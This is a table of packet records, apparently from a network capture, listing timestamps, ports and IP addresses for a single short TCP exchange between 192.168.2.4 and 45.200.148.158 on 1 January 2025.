Jan 1, 2025 18:10:02.114309072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114331007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.114371061 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.114670038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114679098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114696026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114717007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114721060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.114732981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114747047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114758968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114769936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.114774942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.114784002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.114850044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.115133047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115144014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115159035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115175009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115185022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115199089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.115199089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115222931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115228891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.115242958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.115575075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115586996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115608931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115622044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115631104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.115638018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115650892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115659952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.115672112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.115672112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.115988970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.116161108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116170883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116190910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116203070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116218090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116228104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116228104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.116242886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.116245985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116255999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116271019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.116271973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116285086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116303921 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.116306067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116316080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116329908 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.116332054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116343021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116353035 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.116362095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.116389036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.169150114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.169965029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.169989109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.169997931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.170061111 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.170063972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.170080900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.170104980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.170178890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.170190096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.170213938 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.170325041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.170335054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.170528889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.179809093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.179847956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.179858923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.179873943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.179903984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.179980040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180028915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180085897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180098057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180098057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.180114985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180139065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.180370092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180392027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180439949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180505037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180516005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180527925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.180598974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.180640936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180651903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180668116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.180860996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.186575890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.186615944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.186635017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.186657906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.186691046 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.186830997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.186841965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.186861038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.186885118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.186973095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.186985970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187005043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187026024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.187299967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187318087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187331915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.187338114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187350988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187360048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.187371969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187382936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187396049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.187400103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187421083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.187592983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187647104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.187649012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187660933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187674046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187690973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.187700033 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.187742949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.193926096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.193977118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.193989038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.194031000 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.194051981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.194062948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.194192886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.194220066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.194231987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.194247961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.194271088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.194394112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.199697018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.199747086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.199755907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.199791908 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.199840069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.199851036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.199901104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.199989080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200005054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200018883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200042963 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200072050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200124979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200181961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200201988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200212002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200236082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200313091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200320005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200411081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200423956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200436115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200448036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200462103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200463057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200481892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200486898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200509071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200748920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200758934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200777054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200798988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200884104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200910091 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.200968027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200983047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.200993061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201013088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201025963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201036930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201036930 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.201055050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201059103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.201067924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201143980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.201574087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201586962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201601028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201618910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201618910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.201632023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201642990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201647043 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.201659918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201674938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201678038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.201705933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.201987028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.201997995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202018976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202028990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202042103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202044964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202059984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202069044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202075005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202086926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202096939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202101946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202116966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202228069 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202564955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202574968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202594042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202610970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202620029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202634096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202636957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202645063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202650070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202660084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202666044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202677965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202682972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202687979 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.202692986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.202780008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.203191996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203207970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203224897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203238010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203238964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.203249931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203263998 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.203267097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203279018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203293085 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.203294039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203304052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203324080 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.203325987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203337908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203346968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.203351974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203368902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.203391075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.203536034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.256851912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.256905079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.256913900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.256953001 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.257014036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.257023096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.257091999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.257102013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.257113934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.257122040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.257133961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.257147074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.257153988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.266827106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.266957998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.266967058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.266983986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.266985893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.266997099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267008066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.267013073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267168045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.267235994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267250061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267354965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.267406940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267563105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267573118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267589092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.267590046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267602921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267613888 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.267649889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.267704964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267714977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.267812014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.267831087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273546934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273559093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273575068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273597956 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.273621082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.273689985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273704052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273751974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.273844957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273858070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273874044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.273937941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274003983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274013996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274032116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274044991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274049997 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274086952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274302006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274312019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274327993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274337053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274352074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274353981 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274374008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274384975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274399996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274399996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274403095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274416924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274441004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274446964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274451971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.274460077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.274615049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.280729055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.280874968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.280885935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.280977964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.281002045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.281013012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.281029940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.281054020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.281105995 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.281256914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.299875021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.299920082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.299932003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.299937963 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300021887 CET	49730	1129	192.168.2.4	45.200.148.158
